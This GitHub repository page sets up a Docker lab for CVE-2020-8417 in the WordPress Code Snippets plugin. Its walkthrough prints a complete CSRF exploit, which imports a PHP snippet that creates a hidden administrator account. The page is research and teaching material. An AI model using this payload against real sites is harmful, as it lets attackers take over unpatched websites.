Skip to content

vulncrate/wp-codesnippets-cve-2020-8417

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

38 Commits

db/dump

db/dump

 
 

wp/wp-content/plugins/code-snippets

wp/wp-content/plugins/code-snippets

 
 

.gitignore

.gitignore

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

docker-compose.yaml

docker-compose.yaml

 
 

exploit.html

exploit.html

 
 

wp-code-snippets-2020-8417.jpg

wp-code-snippets-2020-8417.jpg

 
 

Repository files navigation

WP Code Snippets Vulnerability (CVE-2020-8417)

This is a Docker PoC for the Code Snippets Vulnerability for security researchers. This repository also contains a walkthrough of how to exploit this vulnerability. Over 200K wordpress websites were vulnerable to this exploit at the time of discovery.

WP Code Snippets

https://wordpress.org/plugins/code-snippets/#developers

Disclaimer

This code is vulnerable and should not be ran in production or exposed through a DMZ/firewall.

CVE-2020-8417

The Code Snippets plugin before 2.14.0 has a high-severity Cross-Site Request Forgery (CSRF) vulnerability that when attacked leads to remote code execution (RCE) and complete site takeover.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8417

https://nvd.nist.gov/vuln/detail/CVE-2020-8417

https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-8417

https://wpvulndb.com/vulnerabilities/10050

Getting Started

You will need to clone the repository locally and then use docker to run the mysql and wordpress images. Everything is here that you need to get started.

Clone the repository

git clone git@github.com:VulnCrate/WP-CodeSnippets-CVE-2020-8417.git

Docker

cd into the root directory of the repository, pull the images first and then run the Docker Compose "up" command.

docker-compose pull

docker-compose up

WordPress Website

You can access and view the WordPress website on your localhost address. Comments to not have to be enabled for this to work.

http://localhost:8000

If you mess up...

Starting over is really easy... run the docker commands below to remove your containers and then run git clean to remove all of the files that were pulled down.

docker rm -f vc_wp_codesnippets_db
docker rm -f vc_wp_codesnippets
git clean -xdf

Walkthrough

The vulnerability in WP Code Snippets allows anyone to use JavaScript to create injectable code into the site through a Cross-Site Request Forgery (CSRF) that ultimately leads to Remote Code Execution (RCE).

Video Walkthrough

Video Walkthrough

PoC

Chloe Chamberland https://twitter.com/infosecchloe

https://wpvulndb.com/vulnerabilities/10050

There's an exploit.html file included in the repository but essentially it's going to make a cross-site request that imports a Code Snippet that hooks into the init function that will create an administrative user.

JavaScript

function submitRequest()
{
    // change this if you use tihs any where else other than localhost.
    var ip = "localhost";

    var maliciousCode = "add_action( 'init', function () {" +
    "$username = 'hacker';" +
    "$password = 'pa$$word';" +
        "$email_address = 'hacker@vulncrate.com';" +
        "if ( ! username_exists( $username ) ) {" +
        "$user_id = wp_create_user( $username, $password, $email_address );" +
            "$user = new WP_User( $user_id );" +
            "$user->set_role( 'administrator' );" +
            "};" +
    "} ); ?>";

    var xhr = new XMLHttpRequest();                
    xhr.open("POST", "http:\/\/" + ip + ":8000\/wp-admin\/admin.php?page=import-snippets", true);
    xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryIpMt0484nyfHOSdA");
    xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
    xhr.withCredentials = true;

    var body = "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
    "Content-Disposition: form-data; name=\"duplicate_action\"\r\n" + 
    "\r\n" + 
    "ignore\r\n" + 
    "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
    "Content-Disposition: form-data; name=\"code_snippets_import_files[]\"; filename=\"code-snippets (2).json\"\r\n" + 
    "Content-Type: application/json\r\n" + 
    "\r\n" + 
    "{\"generator\":\"Code Snippets v2.13.3\",\"date_created\":\"2020-04-18 12:35\",\"snippets\":[{\"name\":\"PoC\",\"scope\":\"global\",\"code\":\"" + maliciousCode + "\",\"priority\":\"1\",\"active\":\"1\"}]}\r\n" + 
    "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
    "Content-Disposition: form-data; name=\"action\"\r\n" + 
    "\r\n" + 
    "save\r\n" + 
    "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
    "Content-Disposition: form-data; name=\"max_file_size\"\r\n" + 
    "\r\n" + 
    "2097152\r\n" + 
    "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" + 
    "Content-Disposition: form-data; name=\"submit\"\r\n" + 
    "\r\n" + 
    "Upload files and import\r\n" + 
    "------WebKitFormBoundaryIpMt0484nyfHOSdA--\r\n";
    
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i); 
    xhr.send(new Blob([aBody]));
    }

HTML

    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>

About

Docker repository with a PoC for WP Code Snippets 2.13.3 (CVE-2020-8417)

Topics

wordpress vulnerability cve-2020-8417

Resources

Readme

License

GPL-3.0 license
Activity
Custom properties

Stars

9 stars

Watchers

3 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages